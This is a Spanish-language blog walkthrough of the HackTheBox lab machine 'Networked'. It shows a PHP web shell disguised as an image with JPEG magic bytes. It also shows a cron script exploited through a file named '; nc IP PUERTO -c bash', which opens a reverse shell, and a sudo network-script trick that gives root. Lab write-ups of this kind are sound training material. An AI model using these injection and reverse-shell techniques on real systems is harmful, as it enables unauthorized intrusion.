<!DOCTYPE html><html lang="en"><head>
    
      <title>
        [HackTheBox – Networked] Spanish Writeup ::
        jorgectf — blog
      </title>
    
    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta name="description" content="Networked Spanish Writeup."/>
<meta name="keywords" content=""/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="https://jorgectf.github.io/blog/post/networked-writeup-spanish./"/>





<link rel="stylesheet" href="https://jorgectf.github.io/blog/assets/style.css"/>

<link rel="stylesheet" href="https://jorgectf.github.io/blog/style.css"/>


<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://jorgectf.github.io/blog/img/apple-touch-icon-144-precomposed.png"/>
<link rel="shortcut icon" href="https://jorgectf.github.io/blog/img/favicon.png"/>


<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Italic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Regular.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Medium.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-MediumItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Bold.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-BoldItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>


<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="[HackTheBox – Networked] Spanish Writeup"/>
<meta name="twitter:description" content="Networked Spanish Writeup."/>



<meta property="og:title" content="[HackTheBox – Networked] Spanish Writeup"/>
<meta property="og:description" content="Networked Spanish Writeup."/>
<meta property="og:type" content="article"/>
<meta property="og:url" content="https://jorgectf.github.io/blog/post/networked-writeup-spanish./"/><meta property="article:section" content="post"/>
<meta property="article:published_time" content="2019-09-10T18:00:00+00:00"/>
<meta property="article:modified_time" content="2019-09-10T18:00:00+00:00"/><meta property="og:site_name" content="jorgectf"/>







  </head>
  <body class="dark-theme">
    <div class="container">
      <header class="header">
  <span class="header__inner">
    <a href="https://jorgectf.github.io/blog/" class="logo" style="text-decoration: none;">
  
  <img src="https://jorgectf.github.io/blog/logo.png" alt="jorgectf"/>
  
</a>
    <span class="header__right">
      
        <nav class="menu">
  <ul class="menu__inner menu__inner--desktop">
    
    
    
    <li><a href="https://jorgectf.gitbook.io/awae-oswe-preparation-resources/">OSWE Cheatsheet</a></li>
    
    
    
    <li><a href="https://jorgectf.github.io/blog/research/">Research</a></li>
    
    
    <li><a href="../">About</a></li>
    
    
  </ul>

  <ul class="menu__inner menu__inner--mobile">
    
    
    <li><a href="https://jorgectf.gitbook.io/awae-oswe-preparation-resources/">OSWE Cheatsheet</a></li>
    
    
    
    <li><a href="https://jorgectf.github.io/blog/research/">Research</a></li>
    
    
    <li><a href="https://jorgectf.github.io/blog/">About</a></li>
  </ul>
</nav>
        <span class="menu-trigger">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
            <path d="M0 0h24v24H0z" fill="none"></path>
            <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"></path>
          </svg>
        </span>
      
      <span class="theme-toggle">
        <svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"></path>
</svg>

      </span>
    </span>
  </span>
</header>


      <div class="content">
        
  
  

  <div class="post">
    <h1 class="post-title">[HackTheBox – Networked] Spanish Writeup</h1>
    <div class="post-meta">
      
        <span class="post-date">
          2019-09-10
        </span>

        
          
        
      

      


      
    </div>

    
      <span class="post-tags">
        
          <a href="https://jorgectf.github.io/blog/tags/spanish/">#Spanish</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/espa%C3%B1ol/">#Español</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/writeup/">#Writeup</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/php/">#php</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/magic-bytes/">#magic bytes</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/msf/">#msf</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/bash/">#bash</a> 
        
      </span>
    

    

    <div class="post-content">
      
      <p><img src="https://jorgectf.github.io/blog/static/networked/logo.png" alt=""/></p>
<h1 id="valoraciones">Valoraciones:</h1>
<p><img src="https://jorgectf.github.io/blog/static/networked/valoraciones.png" alt=""/></p>
<h1 id="escaneo-de-puertos">Escaneo de puertos:</h1>
<pre tabindex="0"><code>Nmap scan report for 10.10.10.146
Host is up (0.10s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn&#39;t have a title (text/html; charset=UTF-8).
443/tcp closed https
</code></pre><h1 id="enumeración">Enumeración</h1>
<p>Accedemos al servidor web.</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-1.png" alt=""/></p>
<p>Enumeramos directorios.</p>
<pre tabindex="0"><code>http://10.10.10.146/index.php (Status: 200)
http://10.10.10.146/upload.php (Status: 200)
http://10.10.10.146/lib.php (Status: 200)
http://10.10.10.146/photos.php (Status: 200)
http://10.10.10.146/uploads (Status: 301)
http://10.10.10.146/backup (Status: 301)
</code></pre><p>Nos centramos primero en /backup y descargamos el contenido.</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-2.png" alt=""/></p>
<h1 id="explotación">Explotación</h1>
<p>Extraemos el contenido y vemos que es el backend en php. Tras un rato para entender el funcionamiento del código, conseguimos subir nuestra shell.</p>
<h4 id="contenido-del-código">Contenido del código:</h4>
<h5 id="uploadphp">upload.php</h5>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-3.png" alt=""/></p>
<h5 id="photosphp">photos.php</h5>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-4.png" alt=""/></p>
<h5 id="libphp">lib.php</h5>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-5.png" alt=""/></p>
<p>Tras estudiar el código y hacer un par de pruebas, subimos nuestra shell cumpliendo los requisitos.</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-6.png" alt=""/></p>
<h5 id="magic-bytes-de-los-archivos-jpeg-para-que-el-servidor-crea-que-es-un-jpeg-el-código-php-que-queremos-que-se-ejecute-al-visitar-el-archivo-en-uploads-y-de-nombre-xphppng-porque-el-servidor-solo-acepta-imágenes-y-necesitamos-el-php-para-que-el-código-se-ejecute">Magic Bytes de los archivos jpeg para que el servidor crea que es un jpeg, el código php que queremos que se ejecute al visitar el archivo en /uploads y de nombre X.php.png porque el servidor solo acepta imágenes y necesitamos el .php para que el código se ejecute.</h5>
<p>Visitando /photos.php vemos que se ha subido (y el servidor no lo previsualiza porque el contenido no es una foto).</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-7.png" alt=""/></p>
<p>Si inspeccionamos el elemento nos muestra su ruta.</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-8.png" alt=""/></p>
<p>Si visitamos esa ruta se ejecuta nuestro código.</p>
<pre tabindex="0"><code> [*] Meterpreter session 1 opened (10.10.14.58:8888 -&gt; 10.10.10.146:33910) at 2019-09-08 17:12:03 +0200
</code></pre><h1 id="post-explotación">Post-Explotación</h1>
<p>Una vez dentro, en la carpeta /home/guly tenemos un script que analiza la carpeta uploads en busca de intrusiones, y si la detecta elimina el archivo y envía un mail a guly.</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-9.png" alt=""/></p>
<p>Básicamente, el script detecta si hay un archivo que no ha pasado el filtro de subida del backend del servidor (se le añade la ip origen del archivo al propio nombre del archivo: 127.0.0.1.png). Si hay un archivo que no ha pasado el filtro, lo elimina.</p>
<p>Línea en la que vamos a inyectar nuestro comando:</p>
<pre tabindex="0"><code>exec(&#34;nohup /bin/rm -f $path$value &gt; /dev/null 2&gt;&amp;1 &amp;&#34;);
</code></pre><p>Debido a que controlamos la variable $value (el nombre de nuestro archivo), vamos a hacer que nos llegue una reverse shell con los permisos de guly. Para eso, subimos un archivo con este nombre: “; nc IP PUERTO -c bash” (El punto y coma se pone para saltar a un comando nuevo y que el anterior no se pegue al nuestro).</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-10.png" alt=""/></p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-11.png" alt=""/></p>
<p>Cuando el cronjob se ejecute, tendremos nuestra shell.</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-12.png" alt=""/></p>
<p>Ya podremos conseguir la flag del usuario en /home/guly/user.txt</p>
<p>Enumerando lo que podemos hacer ahora con estos permisos, sudo -l nos devuelve esto:</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-13.png" alt=""/></p>
<p>Esto dice que podemos correr ese script como root sin necesidad de proporcionar una contraseña para root.</p>
<h5 id="changenamesh">changename.sh</h5>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-14.png" alt=""/></p>
<p>Este script recogerá los parámetros que le pasemos, los meterá en un archivo de configuración de red y lo ejecutará con permisos de root para intentar levantar dichos ajustes. Es tan simple como escribir “echo sh” y nos popeará una shell con permisos de root.</p>
<p><img src="https://jorgectf.github.io/blog/static/networked/captura-15.png" alt=""/></p>
<p>Si has llegado hasta aquí, gracias por leerme! Nos vemos en el siguiente Writeup.</p>

    </div>
    
      
        <div class="pagination">
          <div class="pagination__title">
            <span class="pagination__title-h">Read other posts</span>
            <hr/>
          </div>
          <div class="pagination__buttons">
            
              <span class="button previous">
                <a href="https://jorgectf.github.io/blog/post/traverxec-writeup-spanish/">
                  <span class="button__icon">←</span>
                  <span class="button__text">[HackTheBox – Traverxec] Spanish Writeup</span>
                </a>
              </span>
            
            
              <span class="button next">
                <a href="https://jorgectf.github.io/blog/post/heist-writeup-spanish/">
                  <span class="button__text">[HackTheBox – Heist] Spanish Writeup</span>
                  <span class="button__icon">→</span>
                </a>
              </span>
            
          </div>
        </div>
      
    

    
      
        

<script src="https://unpkg.com/shiki"></script>

<script>
    if (document.querySelector("code[data-lang*='ql']")) {
        shiki
            .getHighlighter({
                theme: 'github-dark',
                langs: [
                    {
                        id: 'codeql',
                        scopeName: 'source.ql',
                        path: '/languages/codeql.tmLanguage.json',
                        samplePath: 'codeql.sample',
                        aliases: ['ql']
                    }
                ]
            })
            .then(highlighter => {
                for (codeElement of document.querySelectorAll("code[data-lang]")) {
                    try {
                        let prev = codeElement.textContent
                        let code = highlighter.codeToHtml(prev, { lang: codeElement.dataset.lang.toString() })
                        codeElement.parentNode.innerHTML = code
                    } catch(err) {
                        console.log(err)
                    }
                }
                for (shikiElement of document.querySelectorAll("pre[class='shiki']")) {
                    shikiElement.parentNode.parentNode.replaceChild(
                        shikiElement, shikiElement.parentNode
                    )
                }
            })
    }
</script>
      
    
  </div>

      </div>

      
        <footer class="footer">
  <div class="footer__inner">
    
      <a href="https://jorgectf.github.io/blog/" class="logo" style="text-decoration: none;">
  
  <img src="https://jorgectf.github.io/blog/logo.png" alt="jorgectf"/>
  
</a>
      <div class="copyright">
        <span>© 2022 Powered by
          <a href="https://gohugo.io" target="_blank" rel="noopener">Hugo</a></span>
        <span>Theme created by
          <a href="https://twitter.com/panr" target="_blank" rel="noopener">panr</a></span>
      </div>
    
  </div>
</footer>

<script src="https://jorgectf.github.io/blog/assets/main.js"></script>


      
    </div>

    
  

</body></html>